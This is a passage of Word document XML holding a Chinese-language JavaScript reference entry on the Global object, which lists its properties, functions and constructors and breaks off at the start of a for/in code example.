      <w:r>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:t>全局</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>全局属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>全局对象不是一个类，所以下面列举的全局属性在自己名称下有独立的参考页。也就是说，在</w:t>
      </w:r>
      <w:r>
        <w:t>"undefined"</w:t>
      </w:r>
      <w:r>
        <w:t>名称下可以找到</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>属性的详细信息，而不是在</w:t>
      </w:r>
      <w:r>
        <w:t>"Global.undefined"</w:t>
      </w:r>
      <w:r>
        <w:t>下寻找。注意，所有全局变量也都是全局对象的属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Infinity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表示正无穷大的数值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表示不是数值的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>undefind</w:t>
      </w:r>
      <w:r>
        <w:t>值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>全局函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>全局对象是一个对象，不是类。下面列举的全局函数不是任何对象的方法，它们的参考页出现在各自的函数名下。例如，在</w:t>
      </w:r>
      <w:r>
        <w:t>"parseInt()"</w:t>
      </w:r>
      <w:r>
        <w:t>下可以找到</w:t>
      </w:r>
      <w:r>
        <w:t>pa</w:t>
      </w:r>
      <w:r>
        <w:t>rseInt()</w:t>
      </w:r>
      <w:r>
        <w:t>函数的详细信息，而不是到</w:t>
      </w:r>
      <w:r>
        <w:t>"Global.parseInt()"</w:t>
      </w:r>
      <w:r>
        <w:t>下查找：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>decodeURI()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>解码使用</w:t>
      </w:r>
      <w:r>
        <w:t>encodeURI()</w:t>
      </w:r>
      <w:r>
        <w:t>转义的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>decodeURIComponent()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>解码使用</w:t>
      </w:r>
      <w:r>
        <w:t>encodeURIComponent()</w:t>
      </w:r>
      <w:r>
        <w:t>转义的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>encodeURI()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通过转义特定字符对</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>编码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>encodeURIComponent()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通过转义特定字符对</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>的组成部分编码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>escape()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用转义序列替换特定字符来对字符串编码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码字符串，</w:t>
      </w:r>
      <w:r>
        <w:t>返回结果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>isFinite()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>判断一个值是否无穷大。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>isNaN()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>判断一个值是否是非数值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>parseFloat()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从字符串中解析数值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>parseInt()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从字符串中解析整数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unescape()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>解码使用</w:t>
      </w:r>
      <w:r>
        <w:t>escape()</w:t>
      </w:r>
      <w:r>
        <w:t>编码的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>全局对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了上面列举的全局属性和全局函数，全局对象还定义一些属性，用来引用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>预定义的所有其他对象。这些属性大部分都是构造函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Array</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Array()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Boolean</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Boolean()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Error</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Error()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>EvalError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>EvalError()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Function</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Function()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>引用一个对象，该对象定义了解析和序列化</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>的函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>引用一个对象，该对象定义了数学函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Number()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>RangeError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>RangeError()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ReferenceError()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>RegExp()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>String</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>String()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>SyntaxError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>SyntaxError()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>TypeError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>TypeError()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>URIError</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>URIError()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>全局对象是一个预定义对象，用做</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中全局属性和全局函数的占位符。通过全局对象，可以访问所有其他预定义的对象、函数和属性。全局对象不是任何对象的属性，因此它没有名字（之所以选择</w:t>
      </w:r>
      <w:r>
        <w:t>Global</w:t>
      </w:r>
      <w:r>
        <w:t>作为该参考页的标题，只是为了方便组织，并不是说全局对象的名字为</w:t>
      </w:r>
      <w:r>
        <w:t>Glo</w:t>
      </w:r>
      <w:r>
        <w:t>bal</w:t>
      </w:r>
      <w:r>
        <w:t>）。在全局</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码中，可以用关键字</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>来引用全局对象。但通常不必用这种方式来引用全局对象，因为全局对象是作用域链的头，这意味着所有不合格的变量和函数名都会作为全局对象的属性来查询。例如，当</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码引用</w:t>
      </w:r>
      <w:r>
        <w:t>parseInt()</w:t>
      </w:r>
      <w:r>
        <w:t>函数时，它引用的就是全局对象的</w:t>
      </w:r>
      <w:r>
        <w:t>parseInt</w:t>
      </w:r>
      <w:r>
        <w:t>属性。全局对象是作用域链的头，还意味着在全局</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码中声明的所有变量都将成为全局对象的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>全局对象只是一个对象，而不是类。不存在</w:t>
      </w:r>
      <w:r>
        <w:t>Global()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数，也就无法实例化一个新的全局对象</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码嵌入一个特定环境时，全局对象通用具有与该特定环境相关的额外属性。实际上，</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准没有规定全局对象的类型，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的实现或嵌入环境可以使用任意类型的对象来作为全局对象，只要该对象定义了这里列举的基本属性和方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例如，在客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，全局对象是</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象，表示运行</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器窗口。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>示例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在核心</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，全局对象的预定义属性都是不可枚举的，因此可以用</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环来列出所有隐式或显式声明的</w:t>
      </w:r>
      <w:r>
        <w:t>全局变量，代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var variables="";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
